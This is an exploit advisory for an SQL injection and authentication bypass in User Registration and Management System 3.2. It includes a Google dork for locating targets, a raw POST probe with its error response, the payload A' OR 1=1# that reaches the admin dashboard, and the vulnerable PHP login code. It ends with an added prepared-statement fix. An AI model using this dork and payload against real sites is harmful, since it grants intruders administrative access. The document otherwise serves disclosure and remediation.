User Registration And Management System 3.2 SQL Injection
User Registration and Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System - SQLi
.:. Google Dorks .:. inurl:loginsystem/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://phpgurukul.com/
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#############|DESCRIPTION|#############

"User Management System is a web based technology which manages user database and provides rights to update their details. In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."

===========================================================================================

Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]

POST PoC #1:

http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1

username='&password=test&login=

Response:

Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9

===========================================================================================

Test #2 => Payload to skip authentication

http://localhost:9000/loginsystem/admin/index.php

username=A' OR 1=1#&password=1&login=

Response:

302 redirect to dashboard.php

===========================================================================================

Vuln File: /loginsystem/admin/index.php

Vul Code:

<?php
session_start();
include_once('../includes/config.php');
// Code for login
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
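The root cause is that the username and password are spliced straight into the SQL string. A parameterised rewrite of the same login block is shown below; this is an added example, not the vendor's code, and it assumes the same $con mysqli connection from ../includes/config.php, the same `admin` table with `username` and `password` (md5) columns, the dashboard.php redirect seen in Test #2, and a hypothetical `$_SESSION['admin_user']` key since the original snippet is cut off before the session is set.

```php
<?php
// Added example, not from the vendor: hardened login for /loginsystem/admin/index.php.
// Assumes $con (mysqli) comes from ../includes/config.php and the `admin` table
// keeps md5 hashes in its `password` column, as the original code does.
session_start();
include_once('../includes/config.php');

// Raise database errors as exceptions instead of echoing PHP warnings (and
// the server's filesystem path) into the response, as PoC #1 shows line 9 doing.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function admin_login(mysqli $con, string $username, string $password): bool
{
    // The stored format is md5 to match the existing schema. Migrating to
    // password_hash()/password_verify() is the better scheme but is a separate change.
    $hash = md5($password);

    // Placeholders send the username to MySQL as data, never as SQL text, so an
    // input such as A' OR 1=1# is compared literally against the column and matches nothing.
    $stmt = mysqli_prepare($con, 'SELECT 1 FROM admin WHERE username = ? AND password = ?');
    mysqli_stmt_bind_param($stmt, 'ss', $username, $hash);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_store_result($stmt);
    $found = mysqli_stmt_num_rows($stmt) > 0;
    mysqli_stmt_close($stmt);
    return $found;
}

if (isset($_POST['login'])) {
    $username = (string)($_POST['username'] ?? '');
    $password = (string)($_POST['password'] ?? '');

    if (admin_login($con, $username, $password)) {
        // New session id on privilege change so a pre-set PHPSESSID cannot be reused.
        session_regenerate_id(true);
        $_SESSION['admin_user'] = $username;   // hypothetical key; original is truncated here
        header('Location: dashboard.php');
        exit;
    }

    // One generic message: do not reveal whether the username or the password failed.
    $error = 'Invalid username or password';
}
```

With this in place the error-based probe from PoC #1 returns the generic message rather than a MySQL warning, and the `A' OR 1=1#` payload from Test #2 no longer produces the 302 to dashboard.php.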